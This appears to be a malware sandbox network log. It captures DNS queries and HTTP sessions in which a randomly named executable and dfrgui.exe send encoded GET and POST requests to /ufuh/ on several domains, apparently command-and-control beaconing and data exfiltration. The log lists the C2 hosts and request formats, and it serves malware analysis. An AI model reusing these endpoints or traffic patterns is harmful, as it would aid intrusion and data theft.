May 2, 2024 08:29:42.028947115 CEST | 8.8.8.8 | 192.168.2.22 | 0x1486 | Name error (3) | www.chrisdomond.com | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:43.135082006 CEST | 8.8.8.8 | 192.168.2.22 | 0xd063 | Name error (3) | www.chrisdomond.com | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:44.240052938 CEST | 8.8.8.8 | 192.168.2.22 | 0xa6bb | Name error (3) | www.chrisdomond.com | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:45.350110054 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc39 | Name error (3) | www.chrisdomond.com | none | none | A (IP address) | IN (0x0001) | false
May 2, 2024 08:29:50.478497982 CEST | 8.8.8.8 | 192.168.2.22 | 0xd9b1 | No error (0) | www.riveramayahousing.com |  | 208.91.197.13 | A (IP address) | IN (0x0001) | false
May 2, 2024 08:30:03.932369947 CEST | 8.8.8.8 | 192.168.2.22 | 0xd026 | No error (0) | www.exclaimer342200213.net | exclaimer342200213.net |  | CNAME (Canonical name) | IN (0x0001) | false
May 2, 2024 08:30:03.932369947 CEST | 8.8.8.8 | 192.168.2.22 | 0xd026 | No error (0) | exclaimer342200213.net |  | 84.33.215.91 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49164 | 66.96.161.166 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:26:56.872559071 CEST | 467 | OUT | GET /ufuh/?pl=YGhnx96XAVFPN8tw+HM+ERdVPj6qvRaWteKDUnkDVIOF49Ku923zFB1LHsiTDOOJR3oxDyM0OU58BlZHZbBCNvk4uEj8jDacBIFePGWcdtykoT8enibuKQ6eq0+l&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.terelprime.com
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:26:56.974514961 CEST | 1087 | IN | HTTP/1.1 404 Not Found
                                                                                            Date: Thu, 02 May 2024 06:26:56 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 867
                                                                                            Connection: close
                                                                                            Server: Apache
                                                                                            Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            Age: 0
                                                                                            Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; } body{ margin:0; border: 0; padding: 0; } </style> <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script> <script type="text/javascript" language="JavaScript"> var url = 'http://www.searchvity.com/?dn=' + document.domain + '&pid=9POL6F2H4'; $(document).ready(function() { $('#ad_frame').attr('src', url); }); </script> </head> <body> <iframe id="ad_frame" src="http://www.searchvity.com/" frameborder="0" scrolling="no"> ... browser does not support iframe's --> </iframe> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49165 | 45.33.6.223 | 80 | 3372 | C:\Windows\SysWOW64\dfrgui.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:01.873955011 CEST | 248 | OUT | GET /2019/sqlite-dll-win32-x86-3290000.zip HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Host: www.sqlite.org
                                                                                            Connection: Keep-Alive
                                                                                            Cache-Control: no-cache
May 2, 2024 08:27:02.009665966 CEST | 249 | IN | HTTP/1.1 200 OK
                                                                                            Connection: keep-alive
                                                                                            Date: Thu, 02 May 2024 06:27:01 GMT
                                                                                            Last-Modified: Thu, 03 Oct 2019 16:46:08 GMT
                                                                                            Cache-Control: max-age=120
                                                                                            ETag: "m5d9625d0s76a84"
                                                                                            Content-type: application/zip; charset=utf-8
                                                                                            Content-length: 486020


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49166 | 94.23.162.163 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:30.028881073 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.kinkynerdspro.blog
                                                                                            Origin: http://www.kinkynerdspro.blog
                                                                                            Referer: http://www.kinkynerdspro.blog/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


Session ID: 3 | Source IP: 192.168.2.22 | Source Port: 49167 | Destination IP: 94.23.162.163 | Destination Port: 80 | PID: 2848
Process: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:32.722992897 CEST | 738 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.kinkynerdspro.blog
                                                                                            Origin: http://www.kinkynerdspro.blog
                                                                                            Referer: http://www.kinkynerdspro.blog/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


Session ID: 4 | Source IP: 192.168.2.22 | Source Port: 49168 | Destination IP: 94.23.162.163 | Destination Port: 80 | PID: 2848
Process: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:35.405441046 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.kinkynerdspro.blog
                                                                                            Origin: http://www.kinkynerdspro.blog
                                                                                            Referer: http://www.kinkynerdspro.blog/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36


Session ID: 5 | Source IP: 192.168.2.22 | Source Port: 49169 | Destination IP: 94.23.162.163 | Destination Port: 80 | PID: 2848
Process: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:38.140760899 CEST | 471 | OUT | GET /ufuh/?pl=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.kinkynerdspro.blog
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:27:38.308695078 CEST | 739 | IN | HTTP/1.1 404 Not Found
                                                                                            Server: nginx/1.14.0 (Ubuntu)
                                                                                            Date: Thu, 02 May 2024 06:27:38 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 580
                                                                                            Connection: close
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 6 | Source IP: 192.168.2.22 | Source Port: 49170 | Destination IP: 194.9.94.86 | Destination Port: 80 | PID: 2848
Process: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:43.797481060 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.xn--matfrmn-jxa4m.se
                                                                                            Origin: http://www.xn--matfrmn-jxa4m.se
                                                                                            Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:27:44.165466070 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 02 May 2024 06:27:44 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/8.1.24
                                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]


Session ID: 7 | Source IP: 192.168.2.22 | Source Port: 49171 | Destination IP: 194.9.94.86 | Destination Port: 80 | PID: 2848
Process: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:46.499875069 CEST | 744 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.xn--matfrmn-jxa4m.se
                                                                                            Origin: http://www.xn--matfrmn-jxa4m.se
                                                                                            Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:27:46.689835072 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 02 May 2024 06:27:46 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/8.1.24
                                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                            May 2, 2024 08:27:46.689853907 CEST1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                            Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                            May 2, 2024 08:27:46.689979076 CEST1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                            Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
May 2, 2024 08:27:46.689992905 CEST | 1289 | IN
                                                                                            Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
May 2, 2024 08:27:46.690090895 CEST | 661 | IN
                                                                                            Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
May 2, 2024 08:27:46.690222025 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.22 | 49172 | 194.9.94.86 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:49.213351011 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.xn--matfrmn-jxa4m.se
                                                                                            Origin: http://www.xn--matfrmn-jxa4m.se
                                                                                            Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:27:49.399626970 CEST | 1591 | OUT
                                                                                            Data Ascii: 3M6TYMYsahxbdkeXqrJXdPCb+yAuTXwpHTG+mWLrs1WNis/uPn+pef6UrzxsL/P/dSPHoWRWIB9OdaoNBJDDZwcdli5QKYrFm9VpSN7Y725/k4uSralC3XEzetlRfitUqPjdDXb//ttg9E4DcbquSCpsRGrwG2vIaB5frPVK+styaW5ZNHEijJ1KZ4oHMgWfZ2ecQEZQ8ufrDx2ab/t7vcLeI/U9SHJvaPEPwRWgUukv/ER6qNo
May 2, 2024 08:27:49.586007118 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 02 May 2024 06:27:49 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/8.1.24
                                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
May 2, 2024 08:27:49.586066961 CEST | 1289 | IN
                                                                                            Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
May 2, 2024 08:27:49.586081982 CEST | 1289 | IN
                                                                                            Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
May 2, 2024 08:27:49.586095095 CEST | 1289 | IN
                                                                                            Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
May 2, 2024 08:27:49.586102009 CEST | 661 | IN
                                                                                            Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
May 2, 2024 08:27:49.586116076 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.22 | 49173 | 194.9.94.86 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:51.914592028 CEST | 473 | OUT | GET /ufuh/?pl=JCl8GzBEdF4l5nIyfkeq0ia6oie6u6lAQeoh+x3kN0jP8DE3DVbhST9RD9xIYa+bXtx9nrjGgO+XENgp6DrguLhYbN7qtNMSCWk+pZJhu575eHJRgqTZAIE4NheL&5h1t=6H6PKFvXjtI4u8k HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Connection: close
                                                                                            Host: www.xn--matfrmn-jxa4m.se
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:27:52.101787090 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                            Server: nginx
                                                                                            Date: Thu, 02 May 2024 06:27:52 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            X-Powered-By: PHP/8.1.24
                                                                                            Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
May 2, 2024 08:27:52.101840019 CEST | 1289 | IN
                                                                                            Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
May 2, 2024 08:27:52.101897001 CEST | 1289 | IN
                                                                                            Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
May 2, 2024 08:27:52.102003098 CEST | 1289 | IN
                                                                                            Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
May 2, 2024 08:27:52.102054119 CEST | 661 | IN
                                                                                            Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
May 2, 2024 08:27:52.102118969 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.22 | 49174 | 91.195.240.19 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:27:57.406066895 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 2159
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.primeplay88.org
                                                                                            Origin: http://www.primeplay88.org
                                                                                            Referer: http://www.primeplay88.org/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
May 2, 2024 08:27:57.581255913 CEST | 112 | OUT
                                                                                            Data Ascii: sCZqwEeL7celPBXmdjXZTnjup84szdYI5gQvn7m9RbWjSMbtAi7AfvLZ0rg1PhAWEBJwLntAfdT9eCfd35dDElASkZdFpUkVGl9Hi+8xj5w13606
May 2, 2024 08:27:57.581259966 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                            content-length: 93
                                                                                            cache-control: no-cache
                                                                                            content-type: text/html
                                                                                            connection: close
                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.22 | 49175 | 91.195.240.19 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:00.253900051 CEST | 729 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 199
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.primeplay88.org
                                                                                            Origin: http://www.primeplay88.org
                                                                                            Referer: http://www.primeplay88.org/ufuh/
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                            Data Ascii: pl=jDXqObkiEjBYQx/pGLEFSxoi687Z/TkEmTWnYWMUOf1gPKiMtHvObWqeIvpjr1YtACi4XQ8gGcbWG5q2PLwxml1daHbw1RYe0+1hOv7GTSjvREdLH7zGt2YB8r54MLTdiNDJ0RhzDmzI+Bz9jqC+KwEEUwzNe5GoCE+0QGUFNcuv2pxXzzo4zwpzk44UpFz9NA==
May 2, 2024 08:28:00.429229975 CEST | 208 | IN | HTTP/1.1 403 Forbidden
                                                                                            content-length: 93
                                                                                            cache-control: no-cache
                                                                                            content-type: text/html
                                                                                            connection: close
                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.22 | 49176 | 91.195.240.19 | 80 | 2848 | C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 08:28:02.949915886 CEST | 2578 | OUT | POST /ufuh/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Content-Length: 3623
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.primeplay88.org
